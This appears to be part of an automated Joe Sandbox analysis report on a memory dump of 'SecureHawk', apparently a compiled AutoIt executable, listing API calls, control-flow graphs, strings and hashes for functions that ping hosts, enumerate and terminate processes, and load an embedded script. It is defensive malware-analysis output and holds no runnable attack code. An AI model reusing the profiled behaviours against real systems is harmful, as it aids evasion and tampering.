                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                  • API String ID: 2914291525-1005189915
                                  • Opcode ID: f11b2f96e609c34365b1710cfea4a3adcc35058be25062e163ca0b8c83726634
                                  • Instruction ID: 532ca9f9fa26dd19de058066257311655577dae21651c1624432331f90a3fd29
                                  • Opcode Fuzzy Hash: f11b2f96e609c34365b1710cfea4a3adcc35058be25062e163ca0b8c83726634
                                  • Instruction Fuzzy Hash: 2F21E5B1900308AFEB429FA4EC89B9DBBF8FB08704F10425AF611E62A0D7B515488F91

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 0030FFFA: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00303094), ref: 00310018
                                    • Part of subcall function 003107EC: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0030309F), ref: 0031080E
                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003030E2
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0034013A
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0034017B
                                  • RegCloseKey.ADVAPI32(?), ref: 003401B9
                                  • _wcscat.LIBCMT ref: 00340212
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                  • API String ID: 2673923337-2727554177
                                  • Opcode ID: 6c10589dd3bcd1a8583f19da3503809f0fe95176c3d474b40b56527e68dbd5d4
                                  • Instruction ID: b2314a2f19a073450971ece471fdcacf30097af9c1644838cabdac7a093cba31
                                  • Opcode Fuzzy Hash: 6c10589dd3bcd1a8583f19da3503809f0fe95176c3d474b40b56527e68dbd5d4
                                  • Instruction Fuzzy Hash: C171A1715093059EC31BEF25EC9199BB7ECFF98304F400A2EF6459B2A1EB709948CB51

                                  Control-flow Graph

                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 00305156
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00305165
                                  • LoadIconW.USER32(00000063), ref: 0030517C
                                  • LoadIconW.USER32(000000A4), ref: 0030518E
                                  • LoadIconW.USER32(000000A2), ref: 003051A0
                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003051C6
                                  • RegisterClassExW.USER32(?), ref: 0030521C
                                    • Part of subcall function 002F3411: GetSysColorBrush.USER32(0000000F), ref: 002F3444
                                    • Part of subcall function 002F3411: RegisterClassExW.USER32(00000030), ref: 002F346E
                                    • Part of subcall function 002F3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002F347F
                                    • Part of subcall function 002F3411: InitCommonControlsEx.COMCTL32(?), ref: 002F349C
                                    • Part of subcall function 002F3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002F34AC
                                    • Part of subcall function 002F3411: LoadIconW.USER32(000000A9), ref: 002F34C2
                                    • Part of subcall function 002F3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002F34D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                  • String ID: #$0$AutoIt v3
                                  • API String ID: 423443420-4155596026
                                  • Opcode ID: d45060a9df5ea3597db672ba26d817b1f8c24afc3f621001299a6c46dea6610a
                                  • Instruction ID: 672e859cbe595d60b6fbc7016c863799e11ff69fcd3f1e3e8c0f4c778e07b232
                                  • Opcode Fuzzy Hash: d45060a9df5ea3597db672ba26d817b1f8c24afc3f621001299a6c46dea6610a
                                  • Instruction Fuzzy Hash: 9D215171D01304AFEB17DFA4EC06B9D7BB8FB08714F000659F604AA2A1D3BA5954CF84

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 923 365be2-365c19 call 2f4dc0 926 365c1b-365c28 call 2f502b 923->926 927 365c39-365c4b WSAStartup 923->927 926->927 936 365c2a-365c35 call 2f502b 926->936 928 365c62-365ca0 call 3040cd call 2f4d37 call 30402a inet_addr gethostbyname 927->928 929 365c4d-365c5d call 346f18 927->929 944 365ca2-365caf IcmpCreateFile 928->944 945 365cb1-365cc1 call 346f18 928->945 937 365dbb-365dc3 929->937 936->927 944->945 946 365cc6-365cf7 call 310f16 call 30433f 944->946 951 365db2-365db6 call 301cb6 945->951 955 365d1a-365d2e IcmpSendEcho 946->955 956 365cf9-365d18 IcmpSendEcho 946->956 951->937 957 365d32-365d34 955->957 956->957 958 365d36-365d3b 957->958 959 365d67-365d69 957->959 960 365d7f-365d91 call 2f4dc0 958->960 961 365d3d-365d42 958->961 962 365d6b-365d77 call 346f18 959->962 971 365d97 960->971 972 365d93-365d95 960->972 965 365d44-365d49 961->965 966 365d79-365d7d 961->966 970 365d99-365dad IcmpCloseHandle WSACleanup call 3045ae 962->970 965->959 969 365d4b-365d50 965->969 966->962 973 365d52-365d57 969->973 974 365d5f-365d65 969->974 970->951 971->970 972->970 973->966 976 365d59-365d5d 973->976 974->962 976->962
                                  APIs
                                  • WSAStartup.WS2_32(00000101,?), ref: 00365C43
                                  • inet_addr.WSOCK32(?,?,?), ref: 00365C88
                                  • gethostbyname.WS2_32(?), ref: 00365C94
                                  • IcmpCreateFile.IPHLPAPI ref: 00365CA2
                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00365D12
                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00365D28
                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00365D9D
                                  • WSACleanup.WSOCK32 ref: 00365DA3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                  • String ID: Ping
                                  • API String ID: 1028309954-2246546115
                                  • Opcode ID: 336f96f01c0dfe8b39d8eee976579cde7db0d8dfdf40a9de69d3a52594d49745
                                  • Instruction ID: 186dbf035701b3424addd935131c654a90c26e525e04183e0b1d1c22000abd48
                                  • Opcode Fuzzy Hash: 336f96f01c0dfe8b39d8eee976579cde7db0d8dfdf40a9de69d3a52594d49745
                                  • Instruction Fuzzy Hash: 97518F71604700AFD722EF24DC89B2AB7E4EF48720F048969F655DB2E1DB70ED458B41

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 977 304d83-304dd1 979 304e31-304e33 977->979 980 304dd3-304dd6 977->980 979->980 983 304e35 979->983 981 304e37 980->981 982 304dd8-304ddf 980->982 987 340942-340970 call 2fc460 call 2fc483 981->987 988 304e3d-304e40 981->988 984 304de5-304dea 982->984 985 304ead-304eb5 PostQuitMessage 982->985 986 304e1a-304e22 DefWindowProcW 983->986 991 304df0-304df2 984->991 992 3409b5-3409c9 call 352b3a 984->992 995 304e61-304e63 985->995 994 304e28-304e2e 986->994 1024 340975-34097c 987->1024 989 304e42-304e43 988->989 990 304e65-304e8c SetTimer RegisterWindowMessageW 988->990 996 3408e5-3408e8 989->996 997 304e49-304e5c KillTimer call 305ac3 call 2f34e4 989->997 990->995 998 304e8e-304e99 CreatePopupMenu 990->998 999 304eb7-304ec1 call 305b29 991->999 1000 304df8-304dfd 991->1000 992->995 1017 3409cf 992->1017 995->994 1003 34091e-34093d MoveWindow 996->1003 1004 3408ea-3408ec 996->1004 997->995 998->995 1019 304ec6 999->1019 1006 304e03-304e08 1000->1006 1007 34099a-3409a1 1000->1007 1003->995 1011 34090d-340919 SetFocus 1004->1011 1012 3408ee-3408f1 1004->1012 1015 304e9b-304eab call 305bd7 1006->1015 1016 304e0e-304e14 1006->1016 1007->986 1014 3409a7-3409b0 call 348637 1007->1014 1011->995 1012->1016 1020 3408f7-340908 call 2fc460 1012->1020 1014->986 1015->995 1016->986 1016->1024 1017->986 1019->995 1020->995 1024->986 1028 340982-340995 call 305ac3 call 3059d3 1024->1028 1028->986
                                  APIs
                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00304E22
                                  • KillTimer.USER32(?,00000001), ref: 00304E4C
                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00304E6F
                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00304E7A
                                  • CreatePopupMenu.USER32 ref: 00304E8E
                                  • PostQuitMessage.USER32(00000000), ref: 00304EAF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                  • String ID: TaskbarCreated
                                  • API String ID: 129472671-2362178303
                                  • Opcode ID: a149afc513e77438cd6d55cd69c558541e53f86934735debeb6e988cc1a44886
                                  • Instruction ID: ec6ed00fae4fb1815dcbb2d6df16d7d390bb228a3059637b0d537b8bee50d0b8
                                  • Opcode Fuzzy Hash: a149afc513e77438cd6d55cd69c558541e53f86934735debeb6e988cc1a44886
                                  • Instruction Fuzzy Hash: 52411CB1206209ABEB1B5F28DC2AB7E769DF740344F040629F701D95E2DB74AD50DB61

                                  Control-flow Graph

                                  APIs
                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00340BDB
                                    • Part of subcall function 00301821: _memmove.LIBCMT ref: 0030185B
                                  • _memset.LIBCMT ref: 00305787
                                  • _wcscpy.LIBCMT ref: 003057DB
                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003057EB
                                  • __swprintf.LIBCMT ref: 00340C51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                  • String ID: Line %d: $AutoIt - $E&E&
                                  • API String ID: 230667853-941963392
                                  • Opcode ID: a1c253cfda6294810957ac138021fd368ee54f180dd29a4d89e8332f8077186d
                                  • Instruction ID: 102150ec1d39b8d198adc93b6774d26ca1c354684e4125f239ec77bd198cfcc0
                                  • Opcode Fuzzy Hash: a1c253cfda6294810957ac138021fd368ee54f180dd29a4d89e8332f8077186d
                                  • Instruction Fuzzy Hash: 5F41B271509304AAD327EB60DC96FDF77ECAF44354F000A1EF5859A0E2EB74A648CB96

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1084 36ede4-36ee13 call 2f4d37 call 353fb5 1088 36ee18-36ee1b 1084->1088 1089 36ee44-36ee48 1088->1089 1090 36ee1d-36ee3f call 2f4dc0 call 346f18 1088->1090 1092 36ee4e-36ee62 OpenProcess 1089->1092 1093 36ef5c-36ef6d call 2f4dc0 1089->1093 1104 36ef6f-36ef77 1090->1104 1095 36ef11-36ef1c TerminateProcess 1092->1095 1096 36ee68-36ee71 GetLastError 1092->1096 1093->1104 1099 36ef53-36ef5a CloseHandle 1095->1099 1100 36ef1e-36ef4c GetLastError call 30fcd9 call 346f18 call 2f4dc0 1095->1100 1102 36ee73-36ee8d call 35390d call 34917c 1096->1102 1103 36eedd-36ef06 call 30fcd9 call 346f18 call 2f4dc0 1096->1103 1099->1104 1100->1099 1118 36eea1-36eecb call 30fcd9 call 346f18 call 2f4dc0 1102->1118 1119 36ee8f-36ee9f OpenProcess 1102->1119 1126 36ef0d-36ef0f 1103->1126 1122 36eed2-36eedb call 348bcc 1118->1122 1119->1122 1122->1126 1126->1095 1126->1104
                                  APIs
                                    • Part of subcall function 00353FB5: CreateToolhelp32Snapshot.KERNEL32 ref: 00353FDA
                                    • Part of subcall function 00353FB5: Process32FirstW.KERNEL32(00000000,?), ref: 00353FE8
                                    • Part of subcall function 00353FB5: CloseHandle.KERNEL32(00000000), ref: 003540B2
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0036EE55
                                  • GetLastError.KERNEL32 ref: 0036EE68
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0036EE97
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0036EF14
                                  • GetLastError.KERNEL32(00000000), ref: 0036EF1F
                                  • CloseHandle.KERNEL32(00000000), ref: 0036EF54
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                  • String ID: SeDebugPrivilege
                                  • API String ID: 2533919879-2896544425
                                  • Opcode ID: 984a05097bb75d168802417d062e0d3daecbd51e431551f7571bd196d4d301aa
                                  • Instruction ID: 45c1aa3649de69af67cc98f225ea2659a8176df3890e0d2874c09512329127e1
                                  • Opcode Fuzzy Hash: 984a05097bb75d168802417d062e0d3daecbd51e431551f7571bd196d4d301aa
                                  • Instruction Fuzzy Hash: 0441DA352002009FDB16EF24DCA6F6EB7A5AF40310F098059FA425F2D2CBB1AD18CF92

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1134 3574ee-357544 InterlockedExchange call 310f16 * 2 ReadFile 1139 3575f8-3575f9 call 310f8c 1134->1139 1140 35754a-35754e 1134->1140 1146 3575fe-357614 InterlockedExchange 1139->1146 1141 3575f5 1140->1141 1142 357554-357569 EnterCriticalSection 1140->1142 1141->1139 1144 35756b-35757a 1142->1144 1145 3575ba-3575ef call 310fa0 LeaveCriticalSection ReadFile 1142->1145 1148 357582-3575b7 call 32b516 call 310f16 call 310fa0 call 310f8c 1144->1148 1149 35757c 1144->1149 1145->1140 1145->1141 1148->1145 1149->1148
                                  APIs
                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00357505
                                    • Part of subcall function 00310F16: std::exception::exception.LIBCMT ref: 00310F4C
                                    • Part of subcall function 00310F16: __CxxThrowException@8.LIBCMT ref: 00310F61
                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0035753C
                                  • EnterCriticalSection.KERNEL32(?), ref: 00357558
                                  • _memmove.LIBCMT ref: 003575A6
                                  • _memmove.LIBCMT ref: 003575C3
                                  • LeaveCriticalSection.KERNEL32(?), ref: 003575D2
                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003575E7
                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00357606
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                  • String ID:
                                  • API String ID: 256516436-0
                                  • Opcode ID: df0c3a1cea1b7a1e4d1115b7165c7ca03d7345ae021bc57662c9893457554204
                                  • Instruction ID: cb891919a3c2c7ffb98560011e779a1b47945a3a8fd05044e0f8e3948678a6e1
                                  • Opcode Fuzzy Hash: df0c3a1cea1b7a1e4d1115b7165c7ca03d7345ae021bc57662c9893457554204
                                  • Instruction Fuzzy Hash: 1131D231900204EBCB16DF54DC86EAEB778EF49710F1440A5FC04AF256D770DA55CBA0

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 003106E6: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00310717
                                    • Part of subcall function 003106E6: MapVirtualKeyW.USER32(00000010,00000000), ref: 0031071F
                                    • Part of subcall function 003106E6: MapVirtualKeyW.USER32(000000A0,00000000), ref: 0031072A
                                    • Part of subcall function 003106E6: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00310735
                                    • Part of subcall function 003106E6: MapVirtualKeyW.USER32(00000011,00000000), ref: 0031073D
                                    • Part of subcall function 003106E6: MapVirtualKeyW.USER32(00000012,00000000), ref: 00310745
                                    • Part of subcall function 0030FE77: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002FAC6B), ref: 0030FED2
                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002FAD08
                                  • OleInitialize.OLE32(00000000), ref: 002FAD85
                                  • CloseHandle.KERNEL32(00000000), ref: 00332E86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                  • String ID: <g;$\d;$c;
                                  • API String ID: 1986988660-2832654409
                                  • Opcode ID: 47f9aa39291ba103932d611efef90b4761f787f37fb0390743df6f5132721380
                                  • Instruction ID: 738672d4a7335cdd307628b44fb191a9748fde480dd01c300a80052298d8b3b0
                                  • Opcode Fuzzy Hash: 47f9aa39291ba103932d611efef90b4761f787f37fb0390743df6f5132721380
                                  • Instruction Fuzzy Hash: E2819FB5901B408EC397DF2AE9576667BECEB8930CB10876AD219C72B3EB7954048F11

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1303 3050db-30514b CreateWindowExW * 2 ShowWindow * 2
                                  APIs
                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00305109
                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0030512A
                                  • ShowWindow.USER32(00000000), ref: 0030513E
                                  • ShowWindow.USER32(00000000), ref: 00305147
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$CreateShow
                                  • String ID: AutoIt v3$edit
                                  • API String ID: 1584632944-3779509399
                                  • Opcode ID: a0981d9beea0d8dbed9009f64627fc6a4d66c63701ab5c5bae93fbe615f78919
                                  • Instruction ID: dda9e0750bd1e4169ce8e86aa09d922c9319b2ef060462bee5e4b4c696dd1c42
                                  • Opcode Fuzzy Hash: a0981d9beea0d8dbed9009f64627fc6a4d66c63701ab5c5bae93fbe615f78919
                                  • Instruction Fuzzy Hash: 3DF030706403907EFA3317236C09E372E7DD7C6F14F000659BA00A6271C6A91800CAB0
                                  APIs
                                    • Part of subcall function 00304A8C: _fseek.LIBCMT ref: 00304AA4
                                    • Part of subcall function 00359B5E: _wcscmp.LIBCMT ref: 00359C4E
                                    • Part of subcall function 00359B5E: _wcscmp.LIBCMT ref: 00359C61
                                  • _free.LIBCMT ref: 00359ACC
                                  • _free.LIBCMT ref: 00359AD3
                                  • _free.LIBCMT ref: 00359B3E
                                    • Part of subcall function 00312EB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00319B84,00000000,00318C8D,003158F3,?), ref: 00312EC9
                                    • Part of subcall function 00312EB5: GetLastError.KERNEL32(00000000,?,00319B84,00000000,00318C8D,003158F3,?), ref: 00312EDB
                                  • _free.LIBCMT ref: 00359B46
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                  • String ID: >>>AUTOIT SCRIPT<<<
                                  • API String ID: 1552873950-2806939583
                                  • Opcode ID: c2851a764345a8ea5923c75ec6552a439da3f9bf500a6b24690c76ca801ae871
                                  • Instruction ID: a7ec907232f98b45b69480b79516badae6df8550ca1b4e0e739d95074705324c
                                  • Opcode Fuzzy Hash: c2851a764345a8ea5923c75ec6552a439da3f9bf500a6b24690c76ca801ae871
                                  • Instruction Fuzzy Hash: 91513DB1E04218ABDF25DF64DC41B9EBBB9FF48300F00049EB649A7291DB715A948F58
                                  APIs
                                    • Part of subcall function 0031586C: __FF_MSGBANNER.LIBCMT ref: 00315883
                                    • Part of subcall function 0031586C: __NMSG_WRITE.LIBCMT ref: 0031588A
                                    • Part of subcall function 0031586C: RtlAllocateHeap.NTDLL(01220000,00000000,00000001,?,?,?,?,00310F33,?,0000FFFF), ref: 003158AF
                                  • std::exception::exception.LIBCMT ref: 00310F4C
                                  • __CxxThrowException@8.LIBCMT ref: 00310F61
                                    • Part of subcall function 003186FB: RaiseException.KERNEL32(?,?,0000FFFF,003AAE78,?,?,?,?,?,00310F66,0000FFFF,003AAE78,?,00000001), ref: 00318750
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                  • String ID: `=8$`=8$h=8
                                  • API String ID: 3902256705-3354843450
                                  • Opcode ID: ed667be194e2babee8ba9678821c9e8b833f285ff34641d17063de8e1330fb9d
                                  • Instruction ID: 2fcee4dbacd7253b88f17ec70ed221842250970c81c1e87a47ac9dae45694025
                                  • Opcode Fuzzy Hash: ed667be194e2babee8ba9678821c9e8b833f285ff34641d17063de8e1330fb9d
                                  • Instruction Fuzzy Hash: 6CF0F43550420D62CB2FBB68DC029DE7BAC9F09710F000066FD049A282EFB08BD5C2D4
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
